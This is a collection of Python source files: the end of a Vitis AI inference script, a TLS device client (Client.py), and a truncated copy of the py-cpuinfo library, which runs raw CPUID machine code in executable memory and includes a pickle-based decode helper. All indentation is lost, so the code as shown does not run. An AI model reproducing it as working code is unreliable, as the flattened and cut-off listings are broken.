print('FPS: %.2f, total frames: %.0f, total time: %.3f seconds' %(fps,runTotal,threads_time))
print (divider)
return
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir',type=str,default='images', help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads', type=int,default=1, help='Number of threads. Default is 1')
ap.add_argument('-m', '--model', type=str,default='model_dir/alexnet_np.xmodel', help='Path of the .xmodel file. Default is model_dir/alexnet_np.xmodel')
args = ap.parse_args()
print (divider)
print ('Command line options:')
print (' --image_dir : ', args.image_dir)
print (' --threads : ', args.threads)
print (' --model : ', args.model)
print (divider)
app(args.image_dir,args.threads,args.model)
if __name__ == '__main__':
main()
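# Example invocation (a sketch; assumes the images folder and a compiled .xmodel from the
# Vitis AI flow are present at these illustrative paths):
#   python3 app_mt.py --image_dir images --threads 4 --model model_dir/alexnet_np.xmodel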
|
Client.py
|
import ssl, socket, threading
from Device import Device
from DataFormatter import Protocol_Receive, Protocol_Send
from Commands import CLI_Command_Handler
import Config
#Connects to the server on the given ip/port and starts a receive thread. We also send the initial device setup data (name/type/id) to the server
def Connect(host, port):
context = ssl.create_default_context() #helps create SSLContext objects for common purposes
context.load_verify_locations('./Auth/certificate.pem') #Load the cert so it will be accepted since it is self signed
connection = context.wrap_socket(socket.socket(socket.AF_INET), #Wrap the socket with TLS
server_hostname=host)
connection.connect((host, port)) #Connect to the server
print(f"Connected to {host}:{port}")
device_setup_message = f"{device.name} {device.archetype} {device.id}" #Create the setup message
Protocol_Send(connection, device_setup_message) #Send the device setup message
Device.this_device.id=Protocol_Receive(connection) #Receive and set the id. If the device id was anything but -1 you will receive the same id as you had sent.
receive_thread = threading.Thread(target=Receive_Data, args=(connection,)) #Create and start a thread to receive data
receive_thread.start()
return connection #Returns the connection object
###Receives data from the given connection and passes it to CLI_Command_Handler.Terminal_Command; if no command is found it is printed to the console
def Receive_Data(connection):
global connected
while connected: #If we have an active connection
try:
message = Protocol_Receive(connection) #Receive message from server
CLI_Command_Handler.Terminal_Command(message,True) #Checks for commands if no command is found prints to console.
except:
print("Connection to host lost.") #If no more data is flowing, we have disconnected from the server
connected = False #Set connected to false
###The terminal for the client to enter commands and send data to server from
def Terminal():
while True:
try:
data_input = input("\n")
CLI_Command_Handler.Terminal_Command(data_input, False)
except Exception as e:
print(e)
#PRE UI FUNCTIONALITY
if __name__ == "__main__":
name = input("Name your device: ").lower() #set our name
archetype = input("Give your device a type: ").lower() #set our archetype
device = Device(name, archetype) #create our device object
connected = False #Initialize connected bool
terminal_thread = threading.Thread(target=Terminal) #Create and start the terminal thread
terminal_thread.start()
while True:
if connected == False: #If we are not connected.
try: #Constantly try to reconnect to the server
connected = True
connection = Connect(Config.SERVER_IP, Config.SERVER_PORT)
device.server = connection
except: #If we fail to connect set connected to false so we try again
connected = False
print("Failed to connect. Trying again...")
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# source: https://github.com/workhorsy/py-cpuinfo/blob/v4.0.0/cpuinfo/cpuinfo.py
# version: 4.0.0
# date: 2018-05-05
# Copyright (c) 2014-2018, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (4, 0, 0)
import os, sys
import glob
import re
import time
import platform
import multiprocessing
import ctypes
import pickle
import base64
import subprocess
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
PY2 = sys.version_info[0] == 2
# Load hacks for Windows
if platform.system().lower() == 'windows':
# Monkey patch multiprocessing's Popen to fork properly on Windows Pyinstaller
# https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
try:
import multiprocessing.popen_spawn_win32 as forking
except ImportError as err:
try:
import multiprocessing.popen_fork as forking
except ImportError as err:
import multiprocessing.forking as forking
class _Popen(forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
os.putenv('_MEIPASS2', sys._MEIPASS)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
forking.Popen = _Popen
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
raw_arch_string = platform.machine()
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_allow_execheap():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execheap"'])[1].strip().lower().endswith('on')
@staticmethod
def sestatus_allow_execmem():
return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execmem"'])[1].strip().lower().endswith('on')
@staticmethod
def dmesg_a():
return run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand
@staticmethod
def winreg_vendor_id():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id
@staticmethod
def winreg_raw_arch_string():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
raw_arch_string = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return raw_arch_string
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = to_hz_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def obj_to_b64(thing):
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def b64_to_obj(thing):
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def run_and_get_stdout(command, pipe_command=None):
if not pipe_command:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = p1.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p1.stdout.close()
output = p2.communicate()[0]
if not PY2:
output = output.decode(encoding='UTF-8')
return p2.returncode, output
def program_paths(program_name):
paths = []
exts = list(filter(None, os.environ.get('PATHEXT', '').split(os.pathsep)))  # list() so the extensions can be re-used for every PATH entry
path = os.environ['PATH']
for p in path.split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _get_hz_string_from_brand(processor_brand):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in processor_brand.lower():
return (1, '0.0')
hz_brand = processor_brand.lower()
scale = 1
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
if '@' in hz_brand:
hz_brand = hz_brand.split('@')[1]
else:
hz_brand = hz_brand.rsplit(None, 1)[1]
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
return (scale, hz_brand)
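# Worked example (hypothetical brand string):
#   _get_hz_string_from_brand('Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz') == (9, '3.4')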
def to_friendly_hz(ticks, scale):
# Get the raw Hz as a string
left, right = to_raw_hz(ticks, scale)
ticks = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = ticks.index('.')
ticks = ticks.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
ticks = '{0}.{1}'.format(ticks[:-scale-1], ticks[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
ticks = '{0:.4f} {1}'.format(float(ticks), symbol)
ticks = ticks.rstrip('0')
return ticks
def to_raw_hz(ticks, scale):
# Scale the numbers
ticks = ticks.lstrip('0')
old_index = ticks.index('.')
ticks = ticks.replace('.', '')
ticks = ticks.ljust(scale + old_index+1, '0')
new_index = old_index + scale
ticks = '{0}.{1}'.format(ticks[:new_index], ticks[new_index:])
left, right = ticks.split('.')
left, right = int(left), int(right)
return (left, right)
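# Worked example: to_raw_hz('3.4', 9) == (3400000000, 0), i.e. 3.4 GHz expressed as whole
# Hz plus a fractional remainder.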
def to_hz_string(ticks):
# Convert to string
ticks = '{0}'.format(ticks)
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
return ticks
def to_friendly_bytes(input):
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
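# Example: to_friendly_bytes('8192K') == '8192 KB'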
def _parse_cpu_string(cpu_string):
# Get location of fields at end of string
fields_index = cpu_string.find('(', cpu_string.find('@'))
#print(fields_index)
# Processor Brand
processor_brand = cpu_string
if fields_index != -1:
processor_brand = cpu_string[0 : fields_index].strip()
#print('processor_brand: ', processor_brand)
fields = None
if fields_index != -1:
fields = cpu_string[fields_index : ]
#print('fields: ', fields)
# Hz
scale, hz_brand = _get_hz_string_from_brand(processor_brand)
# Various fields
vendor_id, stepping, model, family = (None, None, None, None)
if fields:
try:
fields = fields.rsplit('(', 1)[1].split(')')[0].split(',')
fields = [f.strip().lower() for f in fields]
fields = [f.split(':') for f in fields]
fields = [{f[0].strip() : f[1].strip()} for f in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
except:
#raise
pass
return (processor_brand, hz_brand, scale, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_string(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
processor_brand, hz_actual, scale, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
#print('fields: ', fields)
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
#print('name:{0}, value:{1}'.format(name, value))
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
#print('FIELDS: ', (vendor_id, stepping, model, family))
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_actual'] = to_friendly_hz(hz_actual, scale)
if hz_advertised and hz_advertised != '0.0':
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
info['hz_actual_raw'] = to_raw_hz(hz_actual, scale)
return {k: v for k, v in info.items() if v}
except:
#raise
pass
return {}
def parse_arch(raw_arch_string):
arch, bits = None, None
raw_arch_string = raw_arch_string.lower()
# X86
if re.match(r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', raw_arch_string):
arch = 'X86_32'
bits = 32
elif re.match('^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', raw_arch_string):
arch = 'X86_64'
bits = 64
# ARM
elif re.match('^arm64$|^arm64[a-z]$|^arm64-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv8-a|aarch64$', raw_arch_string):
arch = 'ARM_8'
bits = 64
elif re.match('^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', raw_arch_string):
arch = 'ARM_7'
bits = 32
elif re.match('^armv8$|^armv8[a-z]$|^armv8-[a-z]$', raw_arch_string):
arch = 'ARM_8'
bits = 32
# PPC
elif re.match('^ppc32$|^prep$|^pmac$|^powermac$', raw_arch_string):
arch = 'PPC_32'
bits = 32
elif re.match('^powerpc$|^ppc64$|^ppc64le$', raw_arch_string):
arch = 'PPC_64'
bits = 64
# S390X
elif re.match('^s390x$', raw_arch_string):
arch = 'S390X'
bits = 64
# SPARC
elif re.match('^sparc32$|^sparc$', raw_arch_string):
arch = 'SPARC_32'
bits = 32
elif re.match('^sparc64$|^sun4u$|^sun4v$', raw_arch_string):
arch = 'SPARC_64'
bits = 64
# MIPS
elif re.match('^mips$', raw_arch_string):
arch = 'MIPS_32'
bits = 32
elif re.match('^mips64$', raw_arch_string):
arch = 'MIPS_64'
bits = 64
# LOONG
elif re.match('^loongarch32$', raw_arch_string):
arch = 'LOONG_32'
bits = 32
elif re.match('^loongarch64$', raw_arch_string):
arch = 'LOONG_64'
bits = 64
return (arch, bits)
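# Examples: parse_arch('x86_64') == ('X86_64', 64); parse_arch('armv7l') == ('ARM_7', 32)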
def is_bit_set(reg, bit):
mask = 1 << bit
is_set = reg & mask > 0
return is_set
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = False
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = DataSource.sestatus_allow_execheap()
can_selinux_exec_memory = DataSource.sestatus_allow_execmem()
self.is_selinux_enforcing = (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# FIXME: We should not have to use different instructions to
# set eax to 0 or 1, on 32bit and 64bit machines.
def _zero_eax(self):
return (
b"\x31\xC0" # xor eax,eax
)
def _zero_ecx(self):
return (
b"\x31\xC9" # xor ecx,ecx
)
def _one_eax(self):
return (
b"\xB8\x01\x00\x00\x00" # mov eax,0x1"
)
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
self._zero_eax(),
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each byte of EBX, EDX and ECX (in that order) is an ASCII character of the vendor ID
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
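# Worked example (hypothetical EAX value): eax == 0x000306A9 decodes to stepping 9,
# model 0xA, family 6, processor_type 0, extended_model 3, extended_family 0.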
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : is_bit_set(edx, 0),
'vme' : is_bit_set(edx, 1),
'de' : is_bit_set(edx, 2),
'pse' : is_bit_set(edx, 3),
'tsc' : is_bit_set(edx, 4),
'msr' : is_bit_set(edx, 5),
'pae' : is_bit_set(edx, 6),
'mce' : is_bit_set(edx, 7),
'cx8' : is_bit_set(edx, 8),
'apic' : is_bit_set(edx, 9),
#'reserved1' : is_bit_set(edx, 10),
'sep' : is_bit_set(edx, 11),
'mtrr' : is_bit_set(edx, 12),
'pge' : is_bit_set(edx, 13),
'mca' : is_bit_set(edx, 14),
'cmov' : is_bit_set(edx, 15),
'pat' : is_bit_set(edx, 16),
'pse36' : is_bit_set(edx, 17),
'pn' : is_bit_set(edx, 18),
'clflush' : is_bit_set(edx, 19),
#'reserved2' : is_bit_set(edx, 20),
'dts' : is_bit_set(edx, 21),
'acpi' : is_bit_set(edx, 22),
'mmx' : is_bit_set(edx, 23),
'fxsr' : is_bit_set(edx, 24),
'sse' : is_bit_set(edx, 25),
'sse2' : is_bit_set(edx, 26),
'ss' : is_bit_set(edx, 27),
'ht' : is_bit_set(edx, 28),
'tm' : is_bit_set(edx, 29),
'ia64' : is_bit_set(edx, 30),
'pbe' : is_bit_set(edx, 31),
'pni' : is_bit_set(ecx, 0),
'pclmulqdq' : is_bit_set(ecx, 1),
'dtes64' : is_bit_set(ecx, 2),
'monitor' : is_bit_set(ecx, 3),
'ds_cpl' : is_bit_set(ecx, 4),
'vmx' : is_bit_set(ecx, 5),
'smx' : is_bit_set(ecx, 6),
'est' : is_bit_set(ecx, 7),
'tm2' : is_bit_set(ecx, 8),
'ssse3' : is_bit_set(ecx, 9),
'cid' : is_bit_set(ecx, 10),
#'reserved3' : is_bit_set(ecx, 11),
'fma' : is_bit_set(ecx, 12),
'cx16' : is_bit_set(ecx, 13),
'xtpr' : is_bit_set(ecx, 14),
'pdcm' : is_bit_set(ecx, 15),
#'reserved4' : is_bit_set(ecx, 16),
'pcid' : is_bit_set(ecx, 17),
'dca' : is_bit_set(ecx, 18),
'sse4_1' : is_bit_set(ecx, 19),
'sse4_2' : is_bit_set(ecx, 20),
'x2apic' : is_bit_set(ecx, 21),
'movbe' : is_bit_set(ecx, 22),
'popcnt' : is_bit_set(ecx, 23),
'tscdeadline' : is_bit_set(ecx, 24),
'aes' : is_bit_set(ecx, 25),
'xsave' : is_bit_set(ecx, 26),
'osxsave' : is_bit_set(ecx, 27),
'avx' : is_bit_set(ecx, 28),
'f16c' : is_bit_set(ecx, 29),
'rdrnd' : is_bit_set(ecx, 30),
'hypervisor' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : is_bit_set(ebx, 1),
'sgx' : is_bit_set(ebx, 2),
'bmi1' : is_bit_set(ebx, 3),
'hle' : is_bit_set(ebx, 4),
'avx2' : is_bit_set(ebx, 5),
#'reserved' : is_bit_set(ebx, 6),
'smep' : is_bit_set(ebx, 7),
'bmi2' : is_bit_set(ebx, 8),
'erms' : is_bit_set(ebx, 9),
'invpcid' : is_bit_set(ebx, 10),
'rtm' : is_bit_set(ebx, 11),
'pqm' : is_bit_set(ebx, 12),
